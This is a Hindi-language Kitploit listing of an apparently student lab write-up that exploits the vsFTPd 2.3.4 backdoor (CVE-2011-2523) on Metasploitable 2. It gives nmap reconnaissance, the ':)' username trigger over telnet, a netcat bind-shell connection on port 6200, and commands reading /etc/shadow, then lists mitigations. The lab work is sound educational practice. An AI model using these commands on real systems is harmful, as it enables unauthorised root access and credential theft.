Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
metasploitable2-vsftpd-exploitation — परियोजना: Metasploitable 2 पर vsFTPd 2.3.4 बैकडोर शोषण (CVE-2011-2523) | Kitploit
उपकरण/GitHubGitHub/rinaliyeva/metasploitable2-vsftpd-exploitation
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिटोहीनेटवर्क मैपिंगपोर्ट स्कैनिंगभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लर्निंग और शिक्षा
GitHubrinaliyeva/metasploitable2-vsftpd-exploitation

metasploitable2-vsftpd-exploitation

परियोजना: Metasploitable 2 पर vsFTPd 2.3.4 बैकडोर शोषण (CVE-2011-2523)

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

Metasploitable 2 - vsFTPd 2.3.4 शोषण प्रयोगशाला

अवलोकन

यह परियोजना एक जानबूझकर कमजोर मशीन, Metasploitable 2 के विरुद्ध पैनेट्रेशन टेस्टिंग वर्कफ़्लो को प्रदर्शित करती है। उद्देश्य FTP सेवा में एक ज्ञात कमजोरी की पहचान करना, उसका शोषण करना और उसका विश्लेषण करना था, अंततः रूट-स्तरीय पहुँच प्राप्त करना और सुरक्षा प्रभाव का आकलन करना।


प्रयोगशाला सेटअप

  • हमलावर मशीन: Ubuntu (वर्चुअल मशीन)
  • लक्ष्य मशीन: Metasploitable 2 (वर्चुअल मशीन)
  • नेटवर्क कॉन्फ़िगरेशन: होस्ट-ओनली नेटवर्क (192.168.56.0/24)

लक्ष्य सत्यापन

लक्ष्य प्रणाली और उसके नेटवर्क कॉन्फ़िगरेशन को सत्यापित किया गया:

root@kitploit:~
whoami
hostname
ifconfig

लक्ष्य सेटअप सत्यापन


कनेक्टिविटी जाँच

हमलावर और लक्ष्य के बीच नेटवर्क कनेक्टिविटी की पुष्टि की गई:

root@kitploit:~
ping 192.168.56.101

पिंग कनेक्टिविटी जाँच


उद्देश्य

  • नेटवर्क टोही करना
  • उजागर सेवाओं की पहचान करना
  • कमजोर सॉफ़्टवेयर का पता लगाना
  • ज्ञात बैकडोर कमजोरी का शोषण करना
  • रूट पहुँच प्राप्त करना
  • शोषण के बाद विश्लेषण करना

उपयोग किए गए उपकरण

  • Nmap
  • Telnet
  • Netcat
  • Linux (Ubuntu VM)

हमले की प्रक्रिया सारांश

  1. लक्ष्य कॉन्फ़िगरेशन और कनेक्टिविटी सत्यापित की
  2. स्थानीय नेटवर्क पर लक्ष्य होस्ट की खोज की
  3. खुले पोर्ट और उजागर सेवाओं की पहचान की
  4. कमजोर FTP सेवा (vsFTPd 2.3.4) का पता लगाया
  5. निर्मित FTP लॉगिन के माध्यम से बैकडोर को ट्रिगर किया
  6. बाइंड शेल के माध्यम से रूट पहुँच प्राप्त की
  7. शोषण के बाद गणना की

टोही

होस्ट खोज की गई:

root@kitploit:~
nmap -sn 192.168.56.0/24

नेटवर्क पर सक्रिय होस्ट की पहचान की गई।

होस्ट खोज स्कैन


पोर्ट स्कैनिंग

root@kitploit:~
nmap 192.168.56.101

कई खुले पोर्ट खोजे गए, जिनमें शामिल हैं:

  • 21 (FTP)
  • 22 (SSH)
  • 23 (Telnet)
  • 80 (HTTP)
  • 445 (SMB)

पोर्ट स्कैन परिणाम


सेवा गणना

root@kitploit:~
nmap -sV 192.168.56.101

चल रही FTP सेवा की पहचान की गई:

root@kitploit:~
vsFTPd 2.3.4

एक पूर्ण सेवा और स्क्रिप्ट-आधारित स्कैन सहायक फ़ाइलों में शामिल है: Nmap स्कैन आउटपुट।

सेवा गणना


कमजोरी की पहचान

FTP सेवा एक ज्ञात कमजोर संस्करण चला रही थी:

vsFTPd 2.3.4

vsFTPd का यह संस्करण एक दुर्भावनापूर्ण बैकडोर के साथ वितरित किया गया था जो प्रमाणीकरण के दौरान :) युक्त उपयोगकर्ता नाम का उपयोग करने पर ट्रिगर होता है। सक्रिय होने पर, सेवा पोर्ट 6200 पर एक बाइंड शेल खोलती है, जो अनधिकृत दूरस्थ पहुँच की अनुमति देती है।


शोषण (मैन्युअल)

Telnet का उपयोग करके बैकडोर को ट्रिगर किया गया:

root@kitploit:~
telnet 192.168.56.101 21
root@kitploit:~
USER test:)
PASS test

Telnet के माध्यम से बैकडोर ट्रिगर


शेल पहुँच

Netcat का उपयोग करके बैकडोर से कनेक्ट किया गया:

root@kitploit:~
nc 192.168.56.101 6200

बाइंड शेल कनेक्शन


परिणाम

root@kitploit:~
whoami
root@kitploit:~
root

रूट पहुँच सफलतापूर्वक प्राप्त हुई

रूट पहुँच प्रमाण


शोषण के बाद

रूट पहुँच प्राप्त करने के बाद, बुनियादी सिस्टम गणना की गई:

root@kitploit:~
cat /etc/passwd
cat /etc/shadow
  • सिस्टम उपयोगकर्ताओं और सेवा खातों की गणना की गई
  • /etc/shadow से हैश की गई क्रेडेंशियल्स प्राप्त की गईं
  • संवेदनशील सिस्टम फ़ाइलों तक पहुँच प्रदर्शित की गई

उपयोगकर्ता गणना

शैडो फ़ाइल पहुँच


प्रभाव

  • पूर्ण सिस्टम समझौता (रूट-स्तरीय पहुँच)
  • मनमाने आदेशों को निष्पादित करने की क्षमता
  • संवेदनशील क्रेडेंशियल डेटा का खुलासा
  • नेटवर्क के भीतर पार्श्व गति की संभावना

शमन

  • यदि आवश्यक न हो तो FTP सेवा हटाएँ या अक्षम करें
  • कमजोर सॉफ़्टवेयर को सुरक्षित संस्करणों में अपडेट करें
  • असुरक्षित प्रोटोकॉल (जैसे अनएन्क्रिप्टेड FTP) को सुरक्षित विकल्पों (SFTP) से बदलें
  • फ़ायरवॉल नियमों के माध्यम से महत्वपूर्ण सेवाओं तक पहुँच प्रतिबंधित करें
  • लॉगिंग और निगरानी लागू करें
  • मजबूत प्रमाणीकरण नीतियाँ लागू करें

सहायक फ़ाइलें

  • Nmap स्कैन आउटपुट

मुख्य निष्कर्ष

यह प्रयोगशाला दर्शाती है कि कैसे एक एकल कमजोर सेवा पूर्ण सिस्टम समझौते का कारण बन सकती है। यह उचित सेवा कॉन्फ़िगरेशन, पैच प्रबंधन, और उजागर हमले की सतहों को कम करने के महत्व पर प्रकाश डालती है।

मैंने क्या सीखा

यह पहली बार था जब मैंने मैन्युअल रूप से एक वास्तविक दुनिया के बैकडोर का शोषण किया। मैंने सीखा कि कैसे एक एकल दुर्भावनापूर्ण उपयोगकर्ता नाम स्ट्रिंग (:)) रूट-स्तरीय पहुँच को ट्रिगर कर सकती है, जिसने इस बात को मजबूत किया कि टोही में सेवा गणना और संस्करण पहचान क्यों मायने रखती है। मैं बुनियादी Linux पोस्ट-एक्सप्लॉइटेशन कमांड्स, जैसे /etc/shadow पढ़ना और यह समझना कि हैश की गई क्रेडेंशियल्स वास्तव में कैसी दिखती हैं, में अधिक सहज हो गया।

सीमाएँ

यह Metasploitable 2 का उपयोग करके एक नियंत्रित प्रयोगशाला वातावरण था, एक जानबूझकर कमजोर मशीन। vsFTPd 2.3.4 बैकडोर एक ज्ञात CVE (CVE-2011-2523) है जो 2011 से है, इसलिए यह आधुनिक वास्तविक दुनिया की व्यस्तता को प्रतिबिंबित नहीं करता है। एक वास्तविक मूल्यांकन में, चोरी, लॉगिंग बायपास, या पिवोटिंग जैसे अतिरिक्त कदमों की आवश्यकता होगी। यह परियोजना मुख्य शोषण यांत्रिकी को समझने पर केंद्रित थी, न कि पूर्ण पैनेट्रेशन टेस्ट पर।

टूल डाउनलोड करें